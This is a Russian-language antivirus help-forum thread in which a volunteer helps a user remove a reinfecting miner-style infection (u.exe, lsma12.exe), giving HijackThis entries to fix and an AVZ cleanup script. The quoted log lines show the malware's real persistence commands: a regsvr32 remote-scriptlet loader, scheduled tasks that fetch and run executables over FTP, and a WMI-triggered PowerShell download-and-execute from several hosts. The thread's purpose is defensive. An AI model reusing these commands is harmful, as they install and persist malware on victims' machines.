Отключен JavaScript

У вас отключен JavaScript. Некоторые возможности системы не будут работать. Пожалуйста, включите JavaScript для получения доступа ко всем функциям.

Тормозит ноутбук после запуска u.exe (lsma12.exe)

Автор cerealguy3456 , 13 фев 2020 15:34

Друзья!

В данном разделе форума действуют дополнительные правила — тема «Общие правила раздела "Уничтожение вирусов"». Пожалуйста, ознакомьтесь с ними перед размещением любого сообщения в данном разделе.

Для оформления запроса о помощи, внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».

Авторизуйтесь для ответа в теме

Сообщений в теме: 3

#1 OFF cerealguy3456

Новичок

Новички
Cообщений: 2

Отправлено 13 Февраль 2020 - 15:34

После включения через пару минут запускается командная строка которая включает u.exe. Затем ноутбук зависает, не реагирует и не отключается. По адресу где расположен u.exe C:\Windows\inf\aspnet есть еще lsma12.
Ноутбук работает только в безопасном режиме.

Пожалуйста, подскажите как удалить вирус?

Прикрепленные файлы

CollectionLog-2020.02.13-14.24.zip 62,07К скачиваний 1

Сообщение отредактировал cerealguy3456: 13 Февраль 2020 - 15:36

0

Наверх

#2 OFF Sandor

Вежливый хелпер

Консультанты
Старожилы
Cообщений: 11 546

Награды

Отправлено 13 Февраль 2020 - 15:42

Здравствуйте!

Пролечите систему с помощью KVRT.
По окончании зайдите в папку C:\KVRT_Data\, упакуйте папку Reports в архив и прикрепите к следующему сообщению.

Также соберите новый CollectionLog Автологером (пробуйте в нормальном режиме).

0

Наверх

#3 OFF cerealguy3456

Новичок

Новички
Cообщений: 2

Отправлено 13 Февраль 2020 - 21:16

Здравствуйте!
Спасибо за ответ!
К сожалению в нормальном режиме так и не удалось просканировать и сделать лог. Даже проверка KVRT была в нормальном режиме один раз прервана. Файлы u.exe и lsma12.exe после удаления появляются снова.

Прикрепленные файлы

Reports.rar 6,12К скачиваний 1
CollectionLog-2020.02.13-20.05.zip 61,06К скачиваний 1

0

Наверх

#4 OFF Sandor

Вежливый хелпер

Консультанты
Старожилы
Cообщений: 11 546

Награды

Отправлено 14 Февраль 2020 - 09:55

"Пофиксите" в HijackThis:

O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('c:\windows\help\lsmosee.exe', '');
 QuarantineFile('c:\windows\inf\aspnet\lsma12.exe', '');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteSchedulerTask('VKDJ');
 DeleteFile('c:\windows\debug\item.dat', '32');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteFile('c:\windows\help\lsmosee.exe', '32');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '32');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

Пробуйте дальше работать в нормальном режиме.

После перезагрузки выполните такой скрипт:

begin
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
end.

Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KL-).

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.
Прикрепите к следующему сообщению свежий CollectionLog.